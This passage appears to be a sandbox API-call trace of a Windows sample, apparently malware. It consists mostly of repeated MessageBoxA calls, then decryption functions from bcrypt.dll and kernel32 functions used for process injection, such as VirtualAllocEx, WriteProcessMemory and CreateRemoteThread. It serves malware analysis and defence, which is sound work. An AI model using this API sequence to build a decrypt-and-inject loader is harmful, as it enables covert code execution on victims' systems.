lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.399] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.400] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.401] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.402] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.402] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.402] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.402] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.402] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.403] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.404] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.405] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.406] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.407] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.408] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.409] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.410] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0264.882] GetNativeSystemInfo (in: lpSystemInfo=0x19fe64 | out: lpSystemInfo=0x19fe64*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0265.124] VirtualAlloc (lpAddress=0x0, dwSize=0x154000, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000 [0265.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74130000 [0265.140] GetProcAddress (hModule=0x74130000, lpProcName="BCryptSetProperty") returned 0x741347e0 [0265.140] GetProcAddress (hModule=0x74130000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74134910 [0265.140] GetProcAddress (hModule=0x74130000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74133760 [0265.140] GetProcAddress (hModule=0x74130000, lpProcName="BCryptDecrypt") returned 0x74134ff0 [0265.140] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74c90000 [0265.140] GetProcAddress (hModule=0x74c90000, lpProcName="HeapFree") returned 0x74ca1ba0 [0265.140] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAlloc") returned 0x74ca7810 [0265.140] GetProcAddress (hModule=0x74c90000, lpProcName="HeapReAlloc") returned 0x7778efe0 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualQuery") returned 0x74ca7a90 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="TerminateThread") returned 0x74cb0160 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="CreateThread") returned 0x74ca9b90 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="WriteProcessMemory") returned 0x74cd2850 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcess") returned 0x74ca38c0 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="OpenProcess") returned 0x74ca8bf0 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="GetWindowsDirectoryA") returned 0x74cab060 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualProtectEx") returned 0x74cd2790 [0265.141] GetProcAddress (hModule=0x74c90000, lpProcName="VirtualAllocEx") returned 0x74cd2730 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="CreateRemoteThread") returned 0x74cd07f0 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="CreateProcessA") returned 0x74cd0750 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleHandleW") returned 0x74ca9bc0 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="WriteFile") returned 0x74cb6ca0 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileW") returned 0x74cb6890 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryW") returned 0x74caa840 [0265.142] GetProcAddress (hModule=0x74c90000, lpProcName="GetLocalTime") returned 0x74ca9be0 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentThreadId") returned 0x74ca1b90 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentProcessId") returned 0x74ca23e0 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="ReadFile") returned 0x74cb6bb0 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="FindFirstFileA") returned 0x74cb6920 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="GetBinaryTypeW") returned 0x74cd7820 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="FindNextFileA") returned 0x74cb6980 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="GetFullPathNameA") returned 0x74cb6ad0 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="GetTempPathW") returned 0x74cb6b30 [0265.143] GetProcAddress (hModule=0x74c90000, lpProcName="GetPrivateProfileStringW") returned 0x74cb09a0 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="CreateFileA") returned 0x74cb6880 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="GlobalAlloc") returned 0x74ca9950 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="GetCurrentDirectoryW") returned 0x74caa9a0 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="SetCurrentDirectoryW") returned 0x74cafb20 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileSize") returned 0x74cb6a70 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="FreeLibrary") returned 0x74ca9f50 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="SetDllDirectoryW") returned 0x74cb5070 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="GetFileSizeEx") returned 0x74cb6a80 [0265.144] GetProcAddress (hModule=0x74c90000, lpProcName="LoadLibraryA") returned 0x74cb4bf0 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="LocalFree") returned 0x74ca79a0 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForSingleObject") returned 0x74cb6820 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="WaitForMultipleObjects") returned 0x74cb6800 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="CreatePipe") returned 0x74ca0540 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="PeekNamedPipe") returned 0x74cd19b0 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="DuplicateHandle") returned 0x74cb6640 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="SetEvent") returned 0x74cb67d0 [0265.145] GetProcAddress (hModule=0x74c90000, lpProcName="GetStartupInfoA") returned 0x74ca9c10 